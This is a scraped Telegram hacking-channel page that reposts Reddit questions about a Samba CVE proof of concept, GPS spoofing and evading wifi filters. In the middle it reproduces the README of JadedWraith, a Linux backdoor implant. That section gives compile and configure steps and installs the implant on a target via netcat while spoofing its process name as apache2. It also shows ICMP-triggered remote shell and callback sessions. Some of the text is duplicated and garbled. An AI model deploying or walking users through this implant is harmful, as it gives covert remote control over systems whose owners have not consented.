Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
Does any one have CVE-2017-14746 POC?

I am a student and currently doing a research on Use-after-free vulnerability in Samba 4.x. I can't find any PoC of this CVE on google. If any one have it please share. Thank you.

submitted by /u/randomclone99
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
GPS spoofing

I’m trying to figure out a cheap solution to spoof a gps location for a device. The device can connect wireless to my WiFi, or with a LAN cable, or to a cell hotspot, so either a hardware or app solution could work. I did search the App Store on my iPhone, but unless I’m missing something obvious I don’t see anything out there.

Any help is appreciated

submitted by /u/randomdudeinFL
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Someone found my public Ip through Skype and disabled my internet connection

No idea if this is the right place for this. Please redirect me to a more suitable sub if that’s the case.

This was many years ago but someone who I was playing multiplayer games with online years ago and had added on Skype found my public IP address and also managed to remotely disable my internet access.

The guy had hacked me and a friend, found both of our public IPs and disabling both of our access to internet.

How might he have found our IPs? Would this be an instance of a DDos attack? And how might I be able to protect myself in the future against these sorts of instances?

submitted by /u/jsn2918
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Components
The source code for the actual implant can be found inside the src directory. client contains a simple python based client for interacting with JadedWraith. The conf_jawr script is used to configure new JadedWraith executables.
Dependencies
The implant requires a modern C library and libpthread. Depending on the target operating system, libpcap (https://www.kitploit.com/search/label/LibPCAP) may be required (In which case, it you must run the ./configure script with --use-libpcap to enable libpcap support). The Python configuration script and client require the the following packages to work: termcolor, pycryptodomex
How to compile
Simply use the Makefile to compile. Note: The resulting binaries found in bin must be configured before they can be used. $ ./configure
$ make
$ ls -lart bin
-rwxrwxr-x. 1 root root 19712 Jul 31 13:08 JadedWraith-2.0.0-Linux-x86_64.elf

How to configure
Use the conf_jawr script to configure JadedWraith executables. It will search the bin directory for JadedWraith executables to configure. The configured binary will be written to the configured directory. -k 95454c93c8d5d30a0782da72ade10e29 -P 4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj shell ">$ ./conf_jawr
JadedWraith Configuration

Please choose a JadedWraith binary to use:
1. JadedWraith-2.0.0-Linux-x86_64.elf
Binary : 1
Shared Key [95454c93c8d5d30a0782da72ade10e29] :
Enable passive mode (ICMP wakeup) ? [y/n] y
Wakeup Password [4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj] :
argv[0] (Leave blank to not spoof command) [] :

JadedWraith Executable : /tmp/JadedWraith/configured/builds/JadedWraith-2.0.0-Linux-x86_64.1627752415.bin

Try me!
sudo ./wraith-client.py -k 95454c93c8d5d30a0782da72ade10e29 -P 4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj shell

How to install
A configured implant can simply be ran on the target system. If configured to use the passive ICMP functionality, it must be ran as root. The environmental variable _CMD can be used to spoof the process's argv[] apache2 # chmod +x apache2 # _CMD="/usr/sbin/apache2" ./apache2 # rm apache2 '># cd /tmp
# nc -lvp 4444 > apache2
# chmod +x apache2
# _CMD="/usr/sbin/apache2" ./apache2
# rm apache2

How to interact
The wraith-client.py script inside client can be used to interact with JadedWraith. Simply invoke it with the arguments produced by the conf_jawr script, substituting the target's IP for . If utilizing the ICMP functionality, the script must be ran as root to send the ICMP packet. sudo ./wraith-client.py 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell [+] sent ICMP wake up command to 192.168.100.224 [*] backdoor will listen on port 58290 [*] connecting to 192.168.100.224:58290 [+] connection established! [*] entering interactive shell >> .cd /tmp >> w 14:22:49 up 3:02, 1 user, load average: 0.18, 0.19, 0.23 USER TTY LOGIN@ IDLE JCPU PCPU WHAT >> ps -ef UID PID PPID C STIME TTY TIME CMD root 1 0 0 11:20 ? 00:00:01 /usr/lib/systemd/systemd --switched-root --system --deserialize 31 >> .exit $ sudo ./wraith-client.py 127.0.0.1 --callback 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell [+] sent ICMP wake up command to 127.0.0.1 [*] backdoor will connect to port 37943 [*] listening on port 37943 [+] accepted connection! [*] entering interactive shell >> ">$ ~/JadedWraithFork/client> sudo ./wraith-client.py 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell
[+] sent ICMP wake up command to 192.168.100.224
[*] backdoor will listen on port 58290
[*] connecting to 192.168.100.224:58290
[+] connection established!
[*] entering interactive shell
>> .cd /tmp
>> w
14:22:49 up 3:02, 1 user, load average: 0.18, 0.19, 0.23

___________________________
@hacking_Attack
@Hacking_Video
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
>> ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 11:20 ? 00:00:01 /usr/lib/systemd/systemd --switched-root --system --deserialize 31
>> .exit
$ sudo ./wraith-client.py 127.0.0.1 --callback 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell
[+] sent ICMP wake up command to 127.0.0.1
[*] backdoor will c onnect to port 37943
[*] listening on port 37943
[+] accepted connection!
[*] entering interactive shell
>>

Bugs
I'm sure this has plenty of bugs. Let me know if you find any. I wrote this over a few days and the code isn't my proudest. Feel free to report any issues and I'll try to fix them.

Download JadedWraith (https://github.com/phath0m/JadedWraith)

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
How do I get the real physical MAC address of an iPhone?

How do I get the real physical MAC address of an iPhone from Kali (from Linux or Kali)?

The one I obtain with nmap is not the real physical MAC address. It's a "private" software MAC address, as described here: https://support.apple.com/en-gb/HT211949.

submitted by /u/hwoodice
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
How long should I be learning hacking until I do my first bug bounty?

Hi, I've been learning hacking for a week or so, I know this is probably a short time to do anything really, but I'm still curious how long will it take me to hit my first bug bounty?

submitted by /u/darkocvet1
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Hello there:)

So i have a question. When i am around town or at a coffee shop. I hate it when they block all theses websites. And some vpns dont work. Is there anyway on windows i can create an exit node for my ipad to go to my computer (windows 10, can do virtual machine) to my home wifi then my computer sends it back to me so i dont have to go though stupid restricted wifi?

Cheers

submitted by /u/Jps1002331
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video